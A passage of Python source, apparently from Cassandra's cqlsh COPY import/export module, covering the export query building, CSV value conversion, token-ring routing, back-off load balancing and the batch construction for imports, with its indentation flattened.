time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = str(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in list(self.hosts_to_sessions.values()))
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect, we report an error so that the token range
will be retried later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception as e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in list(self.hosts_to_sessions.keys()):
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO() if six.PY3 else BytesIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(list(map(self.format_value, row, cql_types)))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception as e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
formatted = formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
return formatted if six.PY3 else formatted.encode('utf8')
def close(self):
ChildProcess.close(self)
for session in list(self.hosts_to_sessions.values()):
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
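        # Illustrative sketch (hypothetical names, not part of the original module): for a table with a
        # single partition key column "pk" and token_range=(-100, 200), prepare_export_query would build
        # CQL along these lines:
        #   SELECT col_a, col_b FROM ks.tbl WHERE token(pk) > -100 AND token(pk) <= 200
        # The first and last ranges have a None boundary, so only one token() predicate is emitted for them.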
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImmutableDict(frozenset):
"""
Immutable dictionary implementation to represent map types.
We need to pass BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
    that adds iteritems to a frozen set of tuples (which is how dicts are normally made
    immutable in Python).
Must be declared in the top level of the module to be available for pickling.
"""
iteritems = frozenset.__iter__
def items(self):
for k, v in self.iteritems():
yield k, v
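# Minimal usage sketch (illustrative only): an ImmutableDict is built from key/value tuples,
# stays hashable, and exposes the iteritems()/items() interface that BoundStatement.bind() expects:
#   d = ImmutableDict([('k1', 'v1'), ('k2', 'v2')])
#   dict(d.items())   # -> {'k1': 'v1', 'k2': 'v2'}
#   hash(d)           # works, unlike a plain dict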
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
        route the update query to the correct replicas. As far as I understood, this is the easiest
        way to find out the types of the partition columns; we never actually execute this prepared statement.
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(ensure_str(select_query))
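        # Illustrative example (hypothetical schema): for a table with partition key columns (a, b),
        # the statement prepared above would look like
        #   SELECT * FROM ks.tbl WHERE a = ? AND b = ?
        # and is only used to learn the partition key column types, never executed.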
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
        Return a function that converts a string into a value that can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
# we can't distinguish between empty strings and null values in csv. Null values are not supported in
# collections, so it must be an empty string.
if v == self.nullval and not issubclass(t, VarcharType):
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
if sys.version_info.major >= 3:
return bytes.fromhex(v[2:])
else:
return BlobType(v[2:].decode("hex"))
def convert_text(v, **_):
return ensure_str(v)
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == ensure_str(self.boolean_styles[0]).lower() else False
def get_convert_integer_fcn(adapter=int):
"""
            Return a slower or a faster integer conversion function, depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ensure_str('')))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
            Return a slower or a faster decimal conversion function, depending on self.thousands_sep and self.decimal_sep
"""
empty_str = ensure_str('')
dot_str = ensure_str('.')
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str).replace(self.decimal_sep, dot_str))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, dot_str))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
            ignore separators nested inside parentheses or single quotes; the two outermost
            parentheses are stripped and do not appear in the result. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
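            # a few illustrative inputs/outputs for split() (not exhaustive):
            #   split("[1,2,3]")        -> ['1', '2', '3']
            #   split("{[1,2],[3,4]}")  -> ['[1,2]', '[3,4]']   (separators nested one level deeper are ignored)
            #   split("['a,b','c']")    -> ["'a,b'", "'c'"]     (separators inside single quotes are ignored)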
# this should match all possible CQL and CQLSH datetime formats
p = re.compile(r"(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" # YYYY-MM-DD[( |'T')]
+ r"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" # [HH:MM[:SS[.NNNNNN]]]
+ r"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
if six.PY2:
# Python 2 implementation
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
else:
# Python 3 implementation
dtval = datetime.datetime.strptime(val, self.date_time_format)
return dtval.timestamp() * 1000
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/3/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1000) + milliseconds
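        # Illustrative examples of inputs convert_datetime() accepts (exact results depend on the
        # configured date_time_format and the local timezone, so these are sketches, not exact values):
        #   '2017-01-31 10:30:45.123+0100'  -> epoch milliseconds, parsed via the CQL regex above
        #   '1485858645123'                 -> already milliseconds, returned as int(val)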
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
See ImmutableDict above for a discussion of why a special object is needed here.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
vals = [v for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=int),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=int),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
        For everything else we return nulls: None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else (ensure_str("0") if self.is_counter else ensure_str("NULL"))
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
        protection functions to escape values with quotes when required. Also check the row length and
        make sure primary key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception as e:
                # if we could not convert an empty string, then self.nullval has been set to a marker
                # because the user needs to import empty strings; the converters for some types
                # will still fail to convert an empty string, and in this case the null value should be inserted,
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (v, e.message if hasattr(e, 'message') else str(e)))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
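        # Sketch of the composite routing key layout built above (intended to mirror the driver's
        # BoundStatement.routing_key encoding, see the docstring): each serialized partition key
        # component is packed as
        #   struct.pack(">H%dsB" % len(val), len(val), val, 0)
        # i.e. a 2-byte big-endian length, the serialized bytes, and a trailing zero byte, and the
        # packed components are concatenated. Single-column partition keys skip this framing entirely.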
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
    than the token classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
        # Note that metadata refresh is disabled by default and we currently do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
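    # Illustrative example: with ring = [-100, 0, 100] (primitive token values, kept sorted),
    #   get_ring_pos(ring, -50)  -> 1   (index of the first ring token greater than the value)
    #   get_ring_pos(ring, 100)  -> 0   (past the last token wraps around to position 0)
    # bisect_right on primitives is what keeps this fast, as explained in the class docstring.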
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return [r for r in shuffled if r.is_up is not False and r.datacenter == self.local_dc] if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
    exponential back-off if all replicas already have too many in-flight requests.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in range(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
                # the back-off starts at 10 ms (0.01 s) and can go up to 2^max_backoff_attempts,
                # which is currently 12, so 2^12 = 4096, i.e. ~40 seconds when multiplied by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
if self.coverage:
self.start_coverage()
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
self.report_error(exc)
finally:
if self.coverage:
self.stop_coverage()
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
query = ensure_str(query)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
                # do not handle the else case: if a statement could not be created, the exception is handled
                # in self.wrap_make_statement and the error is reported; if an injected failure
                # causes the statement to be None, then we should not report the error, so that we can test
                # the parent process handling missing batches from child processes
except Exception as exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception as exc:
print("Failed to make batch statement: {}".format(exc))
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append(ensure_text("{}={}").format(self.valid_columns[i], ensure_text(value)))
else:
set_clause.append(ensure_text("{}={}+{}").format(self.valid_columns[i], self.valid_columns[i], ensure_text(value)))
full_query_text = query % (ensure_text(',').join(set_clause), ensure_text(' AND ').join(where_clause))
statement.add(ensure_str(full_query_text))
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
        more of the driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
field_sep = b',' if six.PY2 else ','
statement._statements_and_parameters = [(False, query % (field_sep.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception as err:
errors[err.message if hasattr(err, 'message') else str(err)].append(r)
return None
converted_rows = [_f for _f in [convert_row(r) for r in rows] if _f]
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
